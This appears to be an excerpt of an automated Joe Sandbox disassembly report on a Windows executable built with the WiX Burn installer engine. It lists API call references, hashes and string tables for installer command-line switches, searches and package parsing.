                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule___security_init_cookie
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1525027140-0
                                                                                                                                                          • Opcode ID: a52ad42482922efb022202dfef1e7e344a30ec78b24063b19f500984ecd86704
                                                                                                                                                          • Instruction ID: 04f709bc6beec7d2eb2e706d752e54841e45826914cccabae4c9a1108ede7636
                                                                                                                                                          • Opcode Fuzzy Hash: a52ad42482922efb022202dfef1e7e344a30ec78b24063b19f500984ecd86704
                                                                                                                                                          • Instruction Fuzzy Hash: 9AE0923590425D8BDF25ABD8D80239DB7B1FB4431AF10061BDD11272A3D73928088649
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00000000,?,004010DF,?,00000000), ref: 00402534
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                          • Opcode ID: 8d5f9bf9b08cc64b01703d13fadbf2ec1ff359da061b082fd4a6cc2793a2e680
                                                                                                                                                          • Instruction ID: 4f2dd1873488938774489ed6f9a8fcc7e7d9aee893ab071e22de98ac8e10368d
                                                                                                                                                          • Opcode Fuzzy Hash: 8d5f9bf9b08cc64b01703d13fadbf2ec1ff359da061b082fd4a6cc2793a2e680
                                                                                                                                                          • Instruction Fuzzy Hash: 35D02B312025342787285E6D8D18467FB09DF017753414236FC28DA2F0C370CC1187CC
                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,00000000,0040983B,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046AB84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                          • Opcode ID: 267c98abdcfb78fdafe85d9306430068ec91ea3efbc0b5c20a70a9b6978e3845
                                                                                                                                                          • Instruction ID: 1f941cca7e51e81036832e58fdbb59f52590dffbc433d5694740a58b02c27a15
                                                                                                                                                          • Opcode Fuzzy Hash: 267c98abdcfb78fdafe85d9306430068ec91ea3efbc0b5c20a70a9b6978e3845
                                                                                                                                                          • Instruction Fuzzy Hash: 27F0D1B19217669B87259F5DBF58942BBA8F708B40311577FB510D2230CBF44482CF9D
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00407C39: RtlAcquireSRWLockExclusive.NTDLL ref: 00407C56
                                                                                                                                                          • DloadProtectSection.DELAYIMP ref: 00407BB8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AcquireDloadExclusiveLockProtectSection
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3680172570-0
                                                                                                                                                          • Opcode ID: faadd11f11cbc129242d15e3f55f7947adeec5a36324dda74546e534ad45a7ec
                                                                                                                                                          • Instruction ID: 9698d9982d26fc5fd2e4825b6435c1b4e36dbe47f7bd9b05652561742b9baade
                                                                                                                                                          • Opcode Fuzzy Hash: faadd11f11cbc129242d15e3f55f7947adeec5a36324dda74546e534ad45a7ec
                                                                                                                                                          • Instruction Fuzzy Hash: 48D0A930E092008AC721EB22A882B9532A0B709308F80403BE401B12E0C3BC38629A9F
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 004766F8
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0047672E
  • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
  • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00407B67
  • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
  • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00407B67
  • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
  • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00407B67
  • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
  • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• CloseHandle.KERNELBASE(000000FF,?,?), ref: 0043909C
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,00486CB8,000000FF,004087CC,004087E8,004080B0,00000000,?,?), ref: 004232CC
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 004232EF
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00423312
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EA0,000000FF), ref: 00423335
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EA4,000000FF), ref: 00423358
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 0042337B
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EB4,000000FF), ref: 0042339E
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,quiet,000000FF), ref: 004233C1
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EC4,000000FF), ref: 004233E4
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,silent,000000FF), ref: 00423407
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,passive,000000FF), ref: 0042342A
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,layout,000000FF), ref: 004234BF
• CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,unsafeuninstall,000000FF), ref: 0042354B
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,uninstall,000000FF), ref: 00423586
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,repair,000000FF), ref: 004235C1
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,modify,000000FF), ref: 004235FC
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,package,000000FF), ref: 00423637
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,update,000000FF), ref: 0042365A
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,noaupause,000000FF), ref: 0042367D
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,keepaupaused,000000FF), ref: 004236A8
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,disablesystemrestore,000000FF), ref: 004236DC
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,originalsource,000000FF), ref: 0042370A
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent,000000FF), ref: 0042376B
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent:none,000000FF), ref: 004237CC
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.log.append,000000FF), ref: 0042381F
• lstrlenW.KERNEL32(burn.log.mode,burn.log.mode,000000FF), ref: 00423867
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423879
• lstrlenW.KERNEL32(burn.log.mode), ref: 0042388D
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.elevated,000000FF), ref: 0042393A
                                                                                                                                                          • lstrlenW.KERNEL32(burn.system.component), ref: 00423A29
                                                                                                                                                          • lstrlenW.KERNEL32(burn.system.component,burn.system.component,00000000), ref: 00423A37
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423A49
                                                                                                                                                          • lstrlenW.KERNEL32(burn.system.component), ref: 00423A59
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.embedded,000000FF), ref: 00423ACE
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.detect,000000FF), ref: 00423B5C
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.upgrade,000000FF), ref: 00423B9F
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,burn.related.addon,000000FF), ref: 00423BBF
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.addon,000000FF), ref: 00423BE3
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.patch,000000FF), ref: 00423C06
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.patch,000000FF), ref: 00423C29
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.update,000000FF), ref: 00423C4C
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.chain.package,000000FF), ref: 00423C72
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.passthrough,000000FF), ref: 00423C98
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.runonce,000000FF), ref: 00423CC6
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 00423D21
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ignoredependencies,burn.ignoredependencies,00000000), ref: 00423D2F
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423D41
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 00423D51
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ancestors), ref: 00423DC6
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ancestors,burn.ancestors,00000000), ref: 00423DD4
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423DE6
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ancestors), ref: 00423DF6
                                                                                                                                                          • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 00423E6E
                                                                                                                                                          • lstrlenW.KERNEL32(burn.engine.working.directory,burn.engine.working.directory,00000000), ref: 00423E7C
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423E8E
                                                                                                                                                          • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 00423E9E
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 00423F09
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000), ref: 00423F17
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423F29
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 00423F3D
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00423FC8
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000), ref: 00423FD6
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423FE8
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00423FF8
                                                                                                                                                          • lstrlenW.KERNEL32(burn.splash.screen), ref: 00424071
                                                                                                                                                          • lstrlenW.KERNEL32(burn.splash.screen,burn.splash.screen,00000000), ref: 0042407F
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00424091
                                                                                                                                                          • lstrlenW.KERNEL32(burn.splash.screen), ref: 004240A1
                                                                                                                                                          • lstrlenW.KERNEL32(burn.), ref: 00424120
                                                                                                                                                          • lstrlenW.KERNEL32(burn.,burn.,00000000), ref: 0042412E
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00424140
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString$lstrlen
                                                                                                                                                          • String ID: Failed to allocate the list of ancestors.$Failed to allocate the list of dependencies to ignore.$Failed to copy append log file path.$Failed to copy last used source.$Failed to copy log file path.$Failed to copy parent.$Failed to copy path for layout directory.$Failed to ensure size for secret args.$Failed to ensure size for unknown args.$Failed to initialize parent to none.$Failed to parse elevated connection.$Failed to parse embedded connection.$Failed to parse file handle: '%ls'$Failed to parse splash screen window: '%ls'$Failed to store the custom working directory.$Invalid switch: %ls$Missing required parameter for switch: %ls$Multiple mode command-line switches were provided.$Must specify a path for append log.$Must specify a path for log.$Must specify a path for original source.$Must specify a value for parent.$Must specify the elevated name, token and parent process id.$Must specify the embedded name, token and parent process id.$burn.$burn.ancestors$burn.elevated$burn.embedded$burn.engine.working.directory$burn.filehandle.attached$burn.filehandle.self$burn.ignoredependencies$burn.log.append$burn.log.mode$burn.passthrough$burn.related.addon$burn.related.chain.package$burn.related.dependent.addon$burn.related.dependent.patch$burn.related.detect$burn.related.patch$burn.related.update$burn.related.upgrade$burn.runonce$burn.splash.screen$burn.system.component$d:\a\wix\wix\src\burn\engine\core.cpp$disablesystemrestore$help$keepaupaused$layout$log$modify$noaupause$originalsource$package$parent$parent:none$passive$quiet$repair$silent$uninstall$unsafeuninstall$update$xlog
                                                                                                                                                          • API String ID: 1657112622-3494894374
                                                                                                                                                          • Opcode ID: a55a3338bd059bfdf5254fabf150cf1d04fc16abf06028a9a504282915b8a153
                                                                                                                                                          • Instruction ID: a8e92d22a7392b731e9223cf984fc9e15dab52e697960c60d76f6ee4aea655dd
                                                                                                                                                          • Opcode Fuzzy Hash: a55a3338bd059bfdf5254fabf150cf1d04fc16abf06028a9a504282915b8a153
                                                                                                                                                          • Instruction Fuzzy Hash: DEA21471744220BBDB209F44DC4AF6A3375EB04B21FE04656FA65BB2D1D2BCED818B19
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00413EDF
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,DirectorySearch,000000FF,00000000,Condition,00409614,00000000,Variable,00409610,00000000,0047B210,0040960C,0040960C), ref: 004131B6
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,Path,00409620), ref: 00413225
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,path,00000000), ref: 00413242
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,FileSearch,000000FF), ref: 00413268
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,DisableFileRedirection,00409624,00000000,Path,00409620), ref: 00413306
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00413A41
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Compare$FreeHeap$AllocProcess
                                                                                                                                                          • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch|ExtensionSearch|SetVariable$DisableFileRedirection$ExpandEnvironment$ExtensionId$ExtensionSearch$Failed to allocate memory for search structs.$Failed to find extension '%ls' for search '%ls'$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @ExtensionId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Value.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get DisableFileRedirection attribute.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$SetVariable$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$d:\a\wix\wix\src\burn\engine\search.cpp$directory$exists$formatted$keyPath$language$numeric$path$state$string$value$version
                                                                                                                                                          • API String ID: 876487704-2869811979
                                                                                                                                                          • Opcode ID: 511bcd34df386020127fbaefa271fd78cdf2117a1adbf202c0bdac08b4e368fe
                                                                                                                                                          • Instruction ID: 577ec144764d8ee8ed200fe4c02b32dd0145466c09346615437649bd7cdce7b2
                                                                                                                                                          • Opcode Fuzzy Hash: 511bcd34df386020127fbaefa271fd78cdf2117a1adbf202c0bdac08b4e368fe
                                                                                                                                                          • Instruction Fuzzy Hash: C2823E31B40214B6D7205E518C4AFDF3A2ADB85B15F2141ABF608BB2D1D7BD4E81C7AD
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0041559B
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0041618F
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: FreeHeapString$AllocProcess
• String ID: %ls_Compatible$BundlePackage$Cache$CacheId$Chain/BundlePackage|Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to format log path variable for compatible package.$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RepairCondition.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Transaction.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse BUNDLE package.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$Invalid package type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$Non-permanent packages must be uninstallable.$PerMachine$Permanent$RepairCondition$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Transaction$Vital$clbcatq.dll$comres.dll$crypt32.dll$d:\a\wix\wix\src\burn\engine\package.cpp$feclient.dll$force$keep$msasn1.dll$remove$version.dll$wininet.dll
• API String ID: 3351553325-4120539620
• Opcode ID: afe351ebb04b77c6fcee619c15ce535f25c7db605f08761358de2f19cb1b3233
• Instruction ID: f48a601c7569854937c08f90b7a69e7527a0dec13a95de9d9b4ac9c3bf4d5fa0
• Opcode Fuzzy Hash: afe351ebb04b77c6fcee619c15ce535f25c7db605f08761358de2f19cb1b3233
• Instruction Fuzzy Hash: 48721231A40715FBD7119A14CC46FEF76AAAB84714F21403BF609BB2D0EBBDAD81865C
APIs
• CloseHandle.KERNEL32(000000FF,00000000,?,?,?,?,?,00000000,00000000,?,000000B0,00000000,00000000,8000FFFF,?,000000B0), ref: 0043DB1F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CloseHandle
